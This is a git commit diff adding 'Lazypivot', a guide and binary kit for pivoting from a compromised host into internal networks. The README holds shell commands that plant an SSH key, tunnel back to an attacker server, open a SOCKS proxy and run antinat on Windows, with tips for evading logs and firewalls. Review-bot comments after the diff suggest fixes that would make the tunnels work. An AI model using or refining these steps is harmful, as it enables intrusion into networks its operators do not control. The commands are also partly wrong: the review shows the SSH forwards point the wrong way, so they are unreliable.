commit 9807d3fcb52c44557c4e79803e43b947047797fe Author: Giulio Date: Sat Dec 14 19:54:14 2019 +0100 fast release diff --git a/Readme.md b/Readme.md new file mode 100644 index 0000000..04d95aa --- /dev/null +++ b/Readme.md 
@@ -0,0 +1,61 @@ +# Lazypivot +Making pivoting into internal networks easier and faster so you can focus on the real fun :) + +## Principles +The idea is to executa a socks5 server on the compromised target and forward the local exposed port remotely via SSH. +A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat](http://www.malsmith.net/antinat/) coming to the rescue. + +## Linux +### Simpler +On our server +``` +useradd -m -s /bin/nologin targetname +ssh-keygen -t ecdsa -f /tmp/sshkey -q -N "" +mkdir /home/targetname/.ssh +cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys +chown -R targetname:targetname /home/targetname/.ssh +chmod 600 /home/targetname/.ssh/authorized_keys +cat /tmp/sshkey +``` + +Copy the content of /tmp/sshkey + +On the compromised host + +``` +echo "my copied sshkey" >> /tmp/.keyfile +chmod 600 /tmp/.keyfile +ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver +``` + +Now on your server + +``` +ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT +``` + +### Stealthier +We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs. + +Instead of using with the socks options, upload the provided package and directly forward the `antinat` port. +## Windows + +Upload the package and extract it with 7z.exe. + +Start the antinat binary, no admin permissions are required: + +``` +antinat.exe -a -cantinat.xml +``` + +Forward the antinat port with plink: + +``` +plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver +``` + + +## Tips + + * Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules + * [User corkscrew for SSH via HTTP Proxy](https://github.com/bryanpkc/corkscrew) diff --git a/linux/Readme.md b/linux/Readme.md new file mode 100644 index 0000000..b50e84e 
--- /dev/null +++ b/linux/Readme.md @@ -0,0 +1 @@ +Antinat linux build TODO diff --git a/windows/antinat.dll b/windows/antinat.dll new file mode 100755 index 0000000..3fdce3d Binary files /dev/null and b/windows/antinat.dll differ diff --git a/windows/antinat.exe b/windows/antinat.exe new file mode 100755 index 0000000..b909abc Binary files /dev/null and b/windows/antinat.exe differ diff --git a/windows/antinat.xml b/windows/antinat.xml new file mode 100755 index 0000000..46c67c4 --- /dev/null +++ b/windows/antinat.xml @@ -0,0 +1,20 @@ + + + + + + + + + + + +
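Review bot: In the Readme.md hunk the two SSH forwards point the wrong way for what the text describes. The "Principles" paragraph says the port exposed on the compromised host is forwarded to the remote server, but the command run on the compromised host uses `-L 22:127.0.0.1:2222`, which opens a listener on the compromised host (port 22, which would also need root and collides with a running sshd) rather than a listener on `myserver`; a remote forward (`-R 2222:127.0.0.1:22`) is what makes the later `ssh ... 127.0.0.1 -p 2222` step on the server reach the compromised host. The same applies to the Windows `plink ... -L 32768:127.0.0.1:8080` line, and that section never states which port `antinat.xml` binds, so "Forward the antinat port" is not actionable without reading the config. Separately, `ssh -D 0.0.0.0:8080` binds an unauthenticated SOCKS listener on every interface of the server, so anyone able to reach that port gets access into the internal network; bind it to `127.0.0.1` (the OpenSSH default) unless the exposure is intended, and say so in the text. Minor wording: "executa" should be "execute", "any other mean" should be "any other means", "onn" should be "on", and the tips entry should read "Use corkscrew", not "User corkscrew".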
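Review bot: The linux/Readme.md hunk adds a one-line "TODO" placeholder with no content. Either leave the file out until the Linux build exists, or state here that Linux currently uses only the SSH forwarding steps from the top-level Readme, so a reader opening this directory is not left guessing whether a Linux antinat build is supported.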
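Review bot: The windows/antinat.exe and windows/antinat.dll hunks commit prebuilt binaries with no stated version, source or checksum, so a user cannot verify them against the upstream project the top-level Readme links to. Add the antinat version and the SHA-256 of each file to the Readme (or a build script that produces them from the upstream source), and consider whether the binaries need the executable bit (`100755`) at all, since the .dll in particular is loaded rather than run.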
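Review bot: The windows/antinat.xml hunk claims 20 added lines, but no element content is visible in this rendering, so the listening address, port and any authentication settings cannot be reviewed here. Since the Readme forwards "the antinat port" without naming it, the config (or a comment in it) should state which address and port the SOCKS server binds, and it should bind to loopback only so the proxy is reachable solely through the SSH tunnel rather than directly by other hosts on the network.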